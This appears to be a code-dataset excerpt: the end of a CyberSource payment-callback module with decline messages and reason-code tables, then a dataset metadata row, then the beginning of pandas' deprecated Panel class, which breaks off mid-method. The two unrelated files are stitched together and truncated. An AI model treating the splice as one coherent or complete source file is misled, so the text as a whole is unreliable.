ex = CCProcessorWrongAmountException(
_(
u"The amount charged by the processor {charged_amount} {charged_amount_currency} is different "
u"than the total cost of the order {total_cost} {total_cost_currency}."
).format(
charged_amount=auth_amount,
charged_amount_currency=currency,
total_cost=order.total_cost,
total_cost_currency=order.currency
)
)
ex.order = order
raise ex
else:
return {
'accepted': False,
'amt_charged': 0,
'currency': 'usd',
'order': order
}
def _record_purchase(params, order):
"""
Record the purchase and run purchased_callbacks
Args:
params (dict): The parameters we received from CyberSource.
order (Order): The order associated with this payment.
Returns:
None
"""
# Usually, the credit card number will have the form "xxxxxxxx1234"
# Parse the string to retrieve the digits.
# If we can't find any digits, use placeholder values instead.
ccnum_str = params.get('req_card_number', '')
mm = re.search("\d", ccnum_str)
if mm:
ccnum = ccnum_str[mm.start():]
else:
ccnum = "####"
if settings.FEATURES.get("LOG_POSTPAY_CALLBACKS"):
log.info(
"Order %d purchased with params: %s", order.id, json.dumps(params)
)
# Mark the order as purchased and store the billing information
order.purchase(
first=params.get('req_bill_to_forename', ''),
last=params.get('req_bill_to_surname', ''),
street1=params.get('req_bill_to_address_line1', ''),
street2=params.get('req_bill_to_address_line2', ''),
city=params.get('req_bill_to_address_city', ''),
state=params.get('req_bill_to_address_state', ''),
country=params.get('req_bill_to_address_country', ''),
postalcode=params.get('req_bill_to_address_postal_code', ''),
ccnum=ccnum,
cardtype=CARDTYPE_MAP[params.get('req_card_type', '')],
processor_reply_dump=json.dumps(params)
)
def _record_payment_info(params, order):
"""
Record the purchase and run purchased_callbacks
Args:
params (dict): The parameters we received from CyberSource.
Returns:
None
"""
if settings.FEATURES.get("LOG_POSTPAY_CALLBACKS"):
log.info(
"Order %d processed (but not completed) with params: %s", order.id, json.dumps(params)
)
order.processor_reply_dump = json.dumps(params)
order.save()
def _get_processor_decline_html(params):
"""
Return HTML indicating that the user's payment was declined.
Args:
params (dict): Parameters we received from CyberSource.
Returns:
unicode: The rendered HTML.
"""
payment_support_email = microsite.get_value('payment_support_email', settings.PAYMENT_SUPPORT_EMAIL)
return _format_error_html(
_(
"Sorry! Our payment processor did not accept your payment. "
"The decision they returned was {decision}, "
"and the reason was {reason}. "
"You were not charged. Please try a different form of payment. "
"Contact us with payment-related questions at {email}."
).format(
decision='<span class="decision">{decision}</span>'.format(decision=params['decision']),
reason='<span class="reason">{reason_code}:{reason_msg}</span>'.format(
reason_code=params['reason_code'],
reason_msg=REASONCODE_MAP.get(params['reason_code'])
),
email=payment_support_email
)
)
def _get_processor_exception_html(exception):
"""
Return HTML indicating that an error occurred.
Args:
exception (CCProcessorException): The exception that occurred.
Returns:
unicode: The rendered HTML.
"""
payment_support_email = microsite.get_value('payment_support_email', settings.PAYMENT_SUPPORT_EMAIL)
if isinstance(exception, CCProcessorDataException):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a payment confirmation that had inconsistent data! "
u"We apologize that we cannot verify whether the charge went through and take further action on your order. "
u"The specific error message is: {msg} "
u"Your credit card may possibly have been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorWrongAmountException):
return _format_error_html(
_(
u"Sorry! Due to an error your purchase was charged for a different amount than the order total! "
u"The specific error message is: {msg}. "
u"Your credit card has probably been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorSignatureException):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a corrupted message regarding your charge, so we are "
u"unable to validate that the message actually came from the payment processor. "
u"The specific error message is: {msg}. "
u"We apologize that we cannot verify whether the charge went through and take further action on your order. "
u"Your credit card may possibly have been charged. Contact us with payment-specific questions at {email}."
).format(
msg=u'<span class="exception_msg">{msg}</span>'.format(msg=exception.message),
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorUserCancelled):
return _format_error_html(
_(
u"Sorry! Our payment processor sent us back a message saying that you have cancelled this transaction. "
u"The items in your shopping cart will exist for future purchase. "
u"If you feel that this is in error, please contact us with payment-specific questions at {email}."
).format(
email=payment_support_email
)
)
elif isinstance(exception, CCProcessorUserDeclined):
return _format_error_html(
_(
u"We're sorry, but this payment was declined. The items in your shopping cart have been saved. "
u"If you have any questions about this transaction, please contact us at {email}."
).format(
email=payment_support_email
)
)
else:
return _format_error_html(
_(
u"Sorry! Your payment could not be processed because an unexpected exception occurred. "
u"Please contact us at {email} for assistance."
).format(email=payment_support_email)
)
def _format_error_html(msg):
""" Format an HTML error message """
return u'<p class="error_msg">{msg}</p>'.format(msg=msg)
CARDTYPE_MAP = defaultdict(lambda: "UNKNOWN")
CARDTYPE_MAP.update(
{
'001': 'Visa',
'002': 'MasterCard',
'003': 'American Express',
'004': 'Discover',
'005': 'Diners Club',
'006': 'Carte Blanche',
'007': 'JCB',
'014': 'EnRoute',
'021': 'JAL',
'024': 'Maestro',
'031': 'Delta',
'033': 'Visa Electron',
'034': 'Dankort',
'035': 'Laser',
'036': 'Carte Bleue',
'037': 'Carta Si',
'042': 'Maestro Int.',
'043': 'GE Money UK card'
}
)
# Note: these messages come directly from official Cybersource documentation at:
# http://apps.cybersource.com/library/documentation/dev_guides/CC_Svcs_SO_API/html/wwhelp/wwhimpl/js/html/wwhelp.htm#href=reason_codes.html
REASONCODE_MAP = defaultdict(lambda: DEFAULT_REASON)
REASONCODE_MAP.update(
{
'100': _('Successful transaction.'),
'101': _('The request is missing one or more required fields.'),
'102': _('One or more fields in the request contains invalid data.'),
'104': dedent(_(
"""
The merchant reference code for this authorization request matches the merchant reference code of another
authorization request that you sent within the past 15 minutes.
Possible action: Resend the request with a unique merchant reference code.
""")),
'110': _('Only a partial amount was approved.'),
'150': _('General system failure.'),
'151': dedent(_(
"""
The request was received but there was a server timeout. This error does not include timeouts between the
client and the server.
""")),
'152': _('The request was received, but a service did not finish running in time.'),
'200': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by CyberSource
because it did not pass the Address Verification System (AVS).
""")),
'201': dedent(_(
"""
The issuing bank has questions about the request. You do not receive an
authorization code programmatically, but you might receive one verbally by calling the processor.
Possible action: retry with another form of payment.
""")),
'202': dedent(_(
"""
Expired card. You might also receive this if the expiration date you
provided does not match the date the issuing bank has on file.
Possible action: retry with another form of payment.
""")),
'203': dedent(_(
"""
General decline of the card. No other information provided by the issuing bank.
Possible action: retry with another form of payment.
""")),
'204': _('Insufficient funds in the account. Possible action: retry with another form of payment.'),
# 205 was Stolen or lost card. Might as well not show this message to the person using such a card.
'205': _('Stolen or lost card.'),
'207': _('Issuing bank unavailable. Possible action: retry again after a few minutes.'),
'208': dedent(_(
"""
Inactive card or card not authorized for card-not-present transactions.
Possible action: retry with another form of payment.
""")),
'209': _('CVN did not match.'),
'210': _('The card has reached the credit limit. Possible action: retry with another form of payment.'),
'211': _('Invalid card verification number (CVN). Possible action: retry with another form of payment.'),
# 221 was The customer matched an entry on the processor's negative file.
# Might as well not show this message to the person using such a card.
'221': _('The customer matched an entry on the processors negative file.'),
'222': _('Account frozen. Possible action: retry with another form of payment.'),
'230': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by
CyberSource because it did not pass the CVN check.
Possible action: retry with another form of payment.
""")),
'231': _('Invalid account number. Possible action: retry with another form of payment.'),
'232': dedent(_(
"""
The card type is not accepted by the payment processor.
Possible action: retry with another form of payment.
""")),
'233': _('General decline by the processor. Possible action: retry with another form of payment.'),
'234': _(
"There is a problem with the information in your CyberSource account. Please let us know at {0}"
).format(settings.PAYMENT_SUPPORT_EMAIL),
'235': _('The requested capture amount exceeds the originally authorized amount.'),
'236': _('Processor Failure. Possible action: retry the payment'),
'237': _('The authorization has already been reversed.'),
'238': _('The authorization has already been captured.'),
'239': _('The requested transaction amount must match the previous transaction amount.'),
'240': dedent(_(
"""
The card type sent is invalid or does not correlate with the credit card number.
Possible action: retry with the same card or another form of payment.
""")),
'241': _('The request ID is invalid.'),
'242': dedent(_(
"""
You requested a capture, but there is no corresponding, unused authorization record. Occurs if there was
not a previously successful authorization request or if the previously successful authorization has already
been used by another capture request.
""")),
'243': _('The transaction has already been settled or reversed.'),
'246': dedent(_(
"""
Either the capture or credit is not voidable because the capture or credit information has already been
submitted to your processor, or you requested a void for a type of transaction that cannot be voided.
""")),
'247': _('You requested a credit for a capture that was previously voided.'),
'250': _('The request was received, but there was a timeout at the payment processor.'),
'254': _('Stand-alone credits are not allowed.'),
'475': _('The cardholder is enrolled for payer authentication'),
'476': _('Payer authentication could not be authenticated'),
'520': dedent(_(
"""
The authorization request was approved by the issuing bank but declined by CyberSource based
on your legacy Smart Authorization settings.
Possible action: retry with a different form of payment.
""")),
}
)
def is_user_payment_error(reason_code):
"""
Decide, based on the reason_code, whether or not it signifies a problem
with something the user did (rather than a system error beyond the user's
control).
This function is used to determine whether we can/should show the user a
message with suggested actions to fix the problem, or simply apologize and
ask her to try again later.
"""
reason_code = str(reason_code)
if reason_code not in REASONCODE_MAP or REASONCODE_MAP[reason_code] == DEFAULT_REASON:
return False
return (200 <= int(reason_code) <= 233) or int(reason_code) in (101, 102, 240)
| agpl-3.0 | 1,539,667,478,606,203,000 | 38.3361 | 201 | 0.622222 | false |
GuessWhoSamFoo/pandas | pandas/core/panel.py | 1 | 55911 | """
Contains data structures designed for manipulating panel (3-dimensional) data
"""
# pylint: disable=E1103,W0231,W0212,W0621
from __future__ import division
import warnings
import numpy as np
import pandas.compat as compat
from pandas.compat import OrderedDict, map, range, u, zip
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender, Substitution, deprecate_kwarg
from pandas.util._validators import validate_axis_style_args
from pandas.core.dtypes.cast import (
cast_scalar_to_array, infer_dtype_from_scalar, maybe_cast_item)
from pandas.core.dtypes.common import (
is_integer, is_list_like, is_scalar, is_string_like)
from pandas.core.dtypes.missing import notna
import pandas.core.common as com
from pandas.core.frame import DataFrame
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (
Index, MultiIndex, _get_objs_combined_axis, ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.indexing import maybe_droplevels
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays,
create_block_manager_from_blocks)
import pandas.core.ops as ops
from pandas.core.reshape.util import cartesian_product
from pandas.core.series import Series
from pandas.io.formats.printing import pprint_thing
_shared_doc_kwargs = dict(
axes='items, major_axis, minor_axis',
klass="Panel",
axes_single_arg="{0, 1, 2, 'items', 'major_axis', 'minor_axis'}",
optional_mapper='', optional_axis='', optional_labels='')
_shared_doc_kwargs['args_transpose'] = (
"three positional arguments: each one of\n{ax_single}".format(
ax_single=_shared_doc_kwargs['axes_single_arg']))
def _ensure_like_indices(time, panels):
"""
Makes sure that time and panels are conformable.
"""
n_time = len(time)
n_panel = len(panels)
u_panels = np.unique(panels) # this sorts!
u_time = np.unique(time)
if len(u_time) == n_time:
time = np.tile(u_time, len(u_panels))
if len(u_panels) == n_panel:
panels = np.repeat(u_panels, len(u_time))
return time, panels
def panel_index(time, panels, names=None):
"""
Returns a multi-index suitable for a panel-like DataFrame.
Parameters
----------
time : array-like
Time index, does not have to repeat
panels : array-like
Panel index, does not have to repeat
names : list, optional
List containing the names of the indices
Returns
-------
multi_index : MultiIndex
Time index is the first level, the panels are the second level.
Examples
--------
>>> years = range(1960,1963)
>>> panels = ['A', 'B', 'C']
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1961, 'A'), (1962, 'A'), (1960, 'B'),
(1961, 'B'), (1962, 'B'), (1960, 'C'), (1961, 'C'),
(1962, 'C')], dtype=object)
or
>>> years = np.repeat(range(1960,1963), 3)
>>> panels = np.tile(['A', 'B', 'C'], 3)
>>> panel_idx = panel_index(years, panels)
>>> panel_idx
MultiIndex([(1960, 'A'), (1960, 'B'), (1960, 'C'), (1961, 'A'),
(1961, 'B'), (1961, 'C'), (1962, 'A'), (1962, 'B'),
(1962, 'C')], dtype=object)
"""
if names is None:
names = ['time', 'panel']
time, panels = _ensure_like_indices(time, panels)
return MultiIndex.from_arrays([time, panels], sortorder=None, names=names)
class Panel(NDFrame):
"""
Represents wide format panel data, stored as 3-dimensional array.
.. deprecated:: 0.20.0
The recommended way to represent 3-D data are with a MultiIndex on a
DataFrame via the :attr:`~Panel.to_frame()` method or with the
`xarray package <http://xarray.pydata.org/en/stable/>`__.
Pandas provides a :attr:`~Panel.to_xarray()` method to automate this
conversion.
Parameters
----------
data : ndarray (items x major x minor), or dict of DataFrames
items : Index or array-like
axis=0
major_axis : Index or array-like
axis=1
minor_axis : Index or array-like
axis=2
copy : boolean, default False
Copy data from inputs. Only affects DataFrame / 2d ndarray input
dtype : dtype, default None
Data type to force, otherwise infer
"""
@property
def _constructor(self):
return type(self)
_constructor_sliced = DataFrame
def __init__(self, data=None, items=None, major_axis=None, minor_axis=None,
copy=False, dtype=None):
# deprecation GH13563
warnings.warn("\nPanel is deprecated and will be removed in a "
"future version.\nThe recommended way to represent "
"these types of 3-dimensional data are with a "
"MultiIndex on a DataFrame, via the "
"Panel.to_frame() method\n"
"Alternatively, you can use the xarray package "
"http://xarray.pydata.org/en/stable/.\n"
"Pandas provides a `.to_xarray()` method to help "
"automate this conversion.\n",
FutureWarning, stacklevel=3)
self._init_data(data=data, items=items, major_axis=major_axis,
minor_axis=minor_axis, copy=copy, dtype=dtype)
def _init_data(self, data, copy, dtype, **kwargs):
"""
Generate ND initialization; axes are passed
as required objects to __init__.
"""
if data is None:
data = {}
if dtype is not None:
dtype = self._validate_dtype(dtype)
passed_axes = [kwargs.pop(a, None) for a in self._AXIS_ORDERS]
if kwargs:
raise TypeError('_init_data() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
axes = None
if isinstance(data, BlockManager):
if com._any_not_none(*passed_axes):
axes = [x if x is not None else y
for x, y in zip(passed_axes, data.axes)]
mgr = data
elif isinstance(data, dict):
mgr = self._init_dict(data, passed_axes, dtype=dtype)
copy = False
dtype = None
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, passed_axes, dtype=dtype, copy=copy)
copy = False
dtype = None
elif is_scalar(data) and com._all_not_none(*passed_axes):
values = cast_scalar_to_array([len(x) for x in passed_axes],
data, dtype=dtype)
mgr = self._init_matrix(values, passed_axes, dtype=values.dtype,
copy=False)
copy = False
else: # pragma: no cover
raise ValueError('Panel constructor not properly called!')
NDFrame.__init__(self, mgr, axes=axes, copy=copy, dtype=dtype)
def _init_dict(self, data, axes, dtype=None):
haxis = axes.pop(self._info_axis_number)
# prefilter if haxis passed
if haxis is not None:
haxis = ensure_index(haxis)
data = OrderedDict((k, v)
for k, v in compat.iteritems(data)
if k in haxis)
else:
keys = com.dict_keys_to_ordered_list(data)
haxis = Index(keys)
for k, v in compat.iteritems(data):
if isinstance(v, dict):
data[k] = self._constructor_sliced(v)
# extract axis for remaining axes & create the slicemap
raxes = [self._extract_axis(self, data, axis=i) if a is None else a
for i, a in enumerate(axes)]
raxes_sm = self._extract_axes_for_slice(self, raxes)
# shallow copy
arrays = []
haxis_shape = [len(a) for a in raxes]
for h in haxis:
v = values = data.get(h)
if v is None:
values = np.empty(haxis_shape, dtype=dtype)
values.fill(np.nan)
elif isinstance(v, self._constructor_sliced):
d = raxes_sm.copy()
d['copy'] = False
v = v.reindex(**d)
if dtype is not None:
v = v.astype(dtype)
values = v.values
arrays.append(values)
return self._init_arrays(arrays, haxis, [haxis] + raxes)
def _init_arrays(self, arrays, arr_names, axes):
return create_block_manager_from_arrays(arrays, arr_names, axes)
@classmethod
def from_dict(cls, data, intersect=False, orient='items', dtype=None):
"""
Construct Panel from dict of DataFrame objects.
Parameters
----------
data : dict
{field : DataFrame}
intersect : boolean
Intersect indexes of input DataFrames
orient : {'items', 'minor'}, default 'items'
The "orientation" of the data. If the keys of the passed dict
should be the items of the result panel, pass 'items'
(default). Otherwise if the columns of the values of the passed
DataFrame objects should be the items (which in the case of
mixed-dtype data you should do), instead pass 'minor'
dtype : dtype, default None
Data type to force, otherwise infer
Returns
-------
Panel
"""
from collections import defaultdict
orient = orient.lower()
if orient == 'minor':
new_data = defaultdict(OrderedDict)
for col, df in compat.iteritems(data):
for item, s in compat.iteritems(df):
new_data[item][col] = s
data = new_data
elif orient != 'items': # pragma: no cover
raise ValueError('Orientation must be one of {items, minor}.')
d = cls._homogenize_dict(cls, data, intersect=intersect, dtype=dtype)
ks = list(d['data'].keys())
if not isinstance(d['data'], OrderedDict):
ks = list(sorted(ks))
d[cls._info_axis_name] = Index(ks)
return cls(**d)
def __getitem__(self, key):
key = com.apply_if_callable(key, self)
if isinstance(self._info_axis, MultiIndex):
return self._getitem_multilevel(key)
if not (is_list_like(key) or isinstance(key, slice)):
return super(Panel, self).__getitem__(key)
return self.loc[key]
def _getitem_multilevel(self, key):
info = self._info_axis
loc = info.get_loc(key)
if isinstance(loc, (slice, np.ndarray)):
new_index = info[loc]
result_index = maybe_droplevels(new_index, key)
slices = [loc] + [slice(None)] * (self._AXIS_LEN - 1)
new_values = self.values[slices]
d = self._construct_axes_dict(self._AXIS_ORDERS[1:])
d[self._info_axis_name] = result_index
result = self._constructor(new_values, **d)
return result
else:
return self._get_item_cache(key)
def _init_matrix(self, data, axes, dtype=None, copy=False):
values = self._prep_ndarray(self, data, copy=copy)
if dtype is not None:
try:
values = values.astype(dtype)
except Exception:
raise ValueError('failed to cast to '
'{datatype}'.format(datatype=dtype))
shape = values.shape
fixed_axes = []
for i, ax in enumerate(axes):
if ax is None:
ax = ibase.default_index(shape[i])
else:
ax = ensure_index(ax)
fixed_axes.append(ax)
return create_block_manager_from_blocks([values], fixed_axes)
# ----------------------------------------------------------------------
# Comparison methods
def _compare_constructor(self, other, func):
if not self._indexed_same(other):
raise Exception('Can only compare identically-labeled '
'same type objects')
new_data = {col: func(self[col], other[col])
for col in self._info_axis}
d = self._construct_axes_dict(copy=False)
return self._constructor(data=new_data, **d)
# ----------------------------------------------------------------------
# Magic methods
def __unicode__(self):
"""
Return a string representation for a particular Panel.
Invoked by unicode(df) in py2 only.
Yields a Unicode String in both py2/py3.
"""
class_name = str(self.__class__)
dims = u('Dimensions: {dimensions}'.format(dimensions=' x '.join(
["{shape} ({axis})".format(shape=shape, axis=axis) for axis, shape
in zip(self._AXIS_ORDERS, self.shape)])))
def axis_pretty(a):
v = getattr(self, a)
if len(v) > 0:
return u('{ax} axis: {x} to {y}'.format(ax=a.capitalize(),
x=pprint_thing(v[0]),
y=pprint_thing(v[-1])))
else:
return u('{ax} axis: None'.format(ax=a.capitalize()))
output = '\n'.join(
[class_name, dims] + [axis_pretty(a) for a in self._AXIS_ORDERS])
return output
def _get_plane_axes_index(self, axis):
"""
Get my plane axes indexes: these are already
(as compared with higher level planes),
as we are returning a DataFrame axes indexes.
"""
axis_name = self._get_axis_name(axis)
if axis_name == 'major_axis':
index = 'minor_axis'
columns = 'items'
if axis_name == 'minor_axis':
index = 'major_axis'
columns = 'items'
elif axis_name == 'items':
index = 'major_axis'
columns = 'minor_axis'
return index, columns
def _get_plane_axes(self, axis):
"""
Get my plane axes indexes: these are already
(as compared with higher level planes),
as we are returning a DataFrame axes.
"""
return [self._get_axis(axi)
for axi in self._get_plane_axes_index(axis)]
fromDict = from_dict
def to_sparse(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sparsifying is not
supported for Panel objects and will raise an error.
Convert to SparsePanel.
"""
raise NotImplementedError("sparsifying is not supported "
"for Panel objects")
def to_excel(self, path, na_rep='', engine=None, **kwargs):
"""
Write each DataFrame in Panel to a separate excel sheet.
Parameters
----------
path : string or ExcelWriter object
File path or existing ExcelWriter
na_rep : string, default ''
Missing data representation
engine : string, default None
write engine to use - you can also set this via the options
``io.excel.xlsx.writer``, ``io.excel.xls.writer``, and
``io.excel.xlsm.writer``.
Other Parameters
----------------
float_format : string, default None
Format string for floating point numbers
cols : sequence, optional
Columns to write
header : boolean or list of string, default True
Write out column names. If a list of string is given it is
assumed to be aliases for the column names
index : boolean, default True
Write row names (index)
index_label : string or sequence, default None
Column label for index column(s) if desired. If None is given, and
`header` and `index` are True, then the index names are used. A
sequence should be given if the DataFrame uses MultiIndex.
startrow : upper left cell row to dump data frame
startcol : upper left cell column to dump data frame
Notes
-----
Keyword arguments (and na_rep) are passed to the ``to_excel`` method
for each DataFrame written.
"""
from pandas.io.excel import ExcelWriter
if isinstance(path, compat.string_types):
writer = ExcelWriter(path, engine=engine)
else:
writer = path
kwargs['na_rep'] = na_rep
for item, df in self.iteritems():
name = str(item)
df.to_excel(writer, name, **kwargs)
writer.save()
def as_matrix(self):
self._consolidate_inplace()
return self._data.as_array()
# ----------------------------------------------------------------------
# Getting and setting elements
def get_value(self, *args, **kwargs):
"""
Quickly retrieve single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
takeable : interpret the passed labels as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(*args, **kwargs)
def _get_value(self, *args, **kwargs):
nargs = len(args)
nreq = self._AXIS_LEN
# require an arg for each axis
if nargs != nreq:
raise TypeError('There must be an argument for each axis, you gave'
' {0} args, but {1} are required'.format(nargs,
nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('get_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
return lower._get_value(*args[1:], takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, *args, **kwargs):
"""
Quickly set single value at (item, major, minor) location.
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
item : item label (panel item)
major : major axis label (panel item row)
minor : minor axis label (panel item column)
value : scalar
takeable : interpret the passed labels as indexers, default False
Returns
-------
panel : Panel
If label combo is contained, will be reference to calling Panel,
otherwise a new object
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(*args, **kwargs)
def _set_value(self, *args, **kwargs):
# require an arg for each axis and the value
nargs = len(args)
nreq = self._AXIS_LEN + 1
if nargs != nreq:
raise TypeError('There must be an argument for each axis plus the '
'value provided, you gave {0} args, but {1} are '
'required'.format(nargs, nreq))
takeable = kwargs.pop('takeable', None)
if kwargs:
raise TypeError('set_value() got an unexpected keyword '
'argument "{0}"'.format(list(kwargs.keys())[0]))
try:
if takeable is True:
lower = self._iget_item_cache(args[0])
else:
lower = self._get_item_cache(args[0])
lower._set_value(*args[1:], takeable=takeable)
return self
except KeyError:
axes = self._expand_axes(args)
d = self._construct_axes_dict_from(self, axes, copy=False)
result = self.reindex(**d)
args = list(args)
likely_dtype, args[-1] = infer_dtype_from_scalar(args[-1])
made_bigger = not np.array_equal(axes[0], self._info_axis)
# how to make this logic simpler?
if made_bigger:
maybe_cast_item(result, args[0], likely_dtype)
return result._set_value(*args)
_set_value.__doc__ = set_value.__doc__
def _box_item_values(self, key, values):
if self.ndim == values.ndim:
result = self._constructor(values)
# a dup selection will yield a full ndim
if result._get_axis(0).is_unique:
result = result[key]
return result
d = self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:])
return self._constructor_sliced(values, **d)
def __setitem__(self, key, value):
key = com.apply_if_callable(key, self)
shape = tuple(self.shape)
if isinstance(value, self._constructor_sliced):
value = value.reindex(
**self._construct_axes_dict_for_slice(self._AXIS_ORDERS[1:]))
mat = value.values
elif isinstance(value, np.ndarray):
if value.shape != shape[1:]:
raise ValueError('shape of value must be {0}, shape of given '
'object was {1}'.format(
shape[1:], tuple(map(int, value.shape))))
mat = np.asarray(value)
elif is_scalar(value):
mat = cast_scalar_to_array(shape[1:], value)
else:
raise TypeError('Cannot set item of '
'type: {dtype!s}'.format(dtype=type(value)))
mat = mat.reshape(tuple([1]) + shape[1:])
NDFrame._set_item(self, key, mat)
def _unpickle_panel_compat(self, state): # pragma: no cover
"""
Unpickle the panel.
"""
from pandas.io.pickle import _unpickle_array
_unpickle = _unpickle_array
vals, items, major, minor = state
items = _unpickle(items)
major = _unpickle(major)
minor = _unpickle(minor)
values = _unpickle(vals)
wp = Panel(values, items, major, minor)
self._data = wp._data
def conform(self, frame, axis='items'):
"""
Conform input DataFrame to align with chosen axis pair.
Parameters
----------
frame : DataFrame
axis : {'items', 'major', 'minor'}
Axis the input corresponds to. E.g., if axis='major', then
the frame's columns would be items, and the index would be
values of the minor axis
Returns
-------
DataFrame
"""
axes = self._get_plane_axes(axis)
return frame.reindex(**self._extract_axes_for_slice(self, axes))
def head(self, n=5):
raise NotImplementedError
def tail(self, n=5):
raise NotImplementedError
def round(self, decimals=0, *args, **kwargs):
"""
Round each value in Panel to a specified number of decimal places.
.. versionadded:: 0.18.0
Parameters
----------
decimals : int
Number of decimal places to round to (default: 0).
If decimals is negative, it specifies the number of
positions to the left of the decimal point.
Returns
-------
Panel object
See Also
--------
numpy.around
"""
nv.validate_round(args, kwargs)
if is_integer(decimals):
result = np.apply_along_axis(np.round, 0, self.values)
return self._wrap_result(result, axis=0)
raise TypeError("decimals must be an integer")
def _needs_reindex_multi(self, axes, method, level):
"""
Don't allow a multi reindex on Panel or above ndim.
"""
return False
def align(self, other, **kwargs):
raise NotImplementedError
def dropna(self, axis=0, how='any', inplace=False):
"""
Drop 2D from panel, holding passed axis constant.
Parameters
----------
axis : int, default 0
Axis to hold constant. E.g. axis=1 will drop major_axis entries
having a certain amount of NA data
how : {'all', 'any'}, default 'any'
'any': one or more values are NA in the DataFrame along the
axis. For 'all' they all must be.
inplace : bool, default False
If True, do operation inplace and return None.
Returns
-------
dropped : Panel
"""
axis = self._get_axis_number(axis)
values = self.values
mask = notna(values)
for ax in reversed(sorted(set(range(self._AXIS_LEN)) - {axis})):
mask = mask.sum(ax)
per_slice = np.prod(values.shape[:axis] + values.shape[axis + 1:])
if how == 'all':
cond = mask > 0
else:
cond = mask == per_slice
new_ax = self._get_axis(axis)[cond]
result = self.reindex_axis(new_ax, axis=axis)
if inplace:
self._update_inplace(result)
else:
return result
def _combine(self, other, func, axis=0):
if isinstance(other, Panel):
return self._combine_panel(other, func)
elif isinstance(other, DataFrame):
return self._combine_frame(other, func, axis=axis)
elif is_scalar(other):
return self._combine_const(other, func)
else:
raise NotImplementedError(
"{otype!s} is not supported in combine operation with "
"{selftype!s}".format(otype=type(other), selftype=type(self)))
def _combine_const(self, other, func):
with np.errstate(all='ignore'):
new_values = func(self.values, other)
d = self._construct_axes_dict()
return self._constructor(new_values, **d)
def _combine_frame(self, other, func, axis=0):
index, columns = self._get_plane_axes(axis)
axis = self._get_axis_number(axis)
other = other.reindex(index=index, columns=columns)
with np.errstate(all='ignore'):
if axis == 0:
new_values = func(self.values, other.values)
elif axis == 1:
new_values = func(self.values.swapaxes(0, 1), other.values.T)
new_values = new_values.swapaxes(0, 1)
elif axis == 2:
new_values = func(self.values.swapaxes(0, 2), other.values)
new_values = new_values.swapaxes(0, 2)
return self._constructor(new_values, self.items, self.major_axis,
self.minor_axis)
def _combine_panel(self, other, func):
items = self.items.union(other.items)
major = self.major_axis.union(other.major_axis)
minor = self.minor_axis.union(other.minor_axis)
# could check that everything's the same size, but forget it
this = self.reindex(items=items, major=major, minor=minor)
other = other.reindex(items=items, major=major, minor=minor)
with np.errstate(all='ignore'):
result_values = func(this.values, other.values)
return self._constructor(result_values, items, major, minor)
def major_xs(self, key):
"""
Return slice of panel along major axis.
Parameters
----------
key : object
Major axis label
Returns
-------
y : DataFrame
index -> minor axis, columns -> items
Notes
-----
major_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of major_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 2)
def minor_xs(self, key):
"""
Return slice of panel along minor axis.
Parameters
----------
key : object
Minor axis label
Returns
-------
y : DataFrame
index -> major axis, columns -> items
Notes
-----
minor_xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of minor_xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
return self.xs(key, axis=self._AXIS_LEN - 1)
def xs(self, key, axis=1):
"""
Return slice of panel along selected axis.
Parameters
----------
key : object
Label
axis : {'items', 'major', 'minor}, default 1/'major'
Returns
-------
y : ndim(self)-1
Notes
-----
xs is only for getting, not setting values.
MultiIndex Slicers is a generic way to get/set values on any level or
levels and is a superset of xs functionality, see
:ref:`MultiIndex Slicers <advanced.mi_slicers>`
"""
axis = self._get_axis_number(axis)
if axis == 0:
return self[key]
self._consolidate_inplace()
axis_number = self._get_axis_number(axis)
new_data = self._data.xs(key, axis=axis_number, copy=False)
result = self._construct_return_type(new_data)
copy = new_data.is_mixed_type
result._set_is_copy(self, copy=copy)
return result
_xs = xs
def _ixs(self, i, axis=0):
"""
Parameters
----------
i : int, slice, or sequence of integers
axis : int
"""
ax = self._get_axis(axis)
key = ax[i]
# xs cannot handle a non-scalar key, so just reindex here
# if we have a multi-index and a single tuple, then its a reduction
# (GH 7516)
if not (isinstance(ax, MultiIndex) and isinstance(key, tuple)):
if is_list_like(key):
indexer = {self._get_axis_name(axis): key}
return self.reindex(**indexer)
# a reduction
if axis == 0:
values = self._data.iget(i)
return self._box_item_values(key, values)
# xs by position
self._consolidate_inplace()
new_data = self._data.xs(i, axis=axis, copy=True, takeable=True)
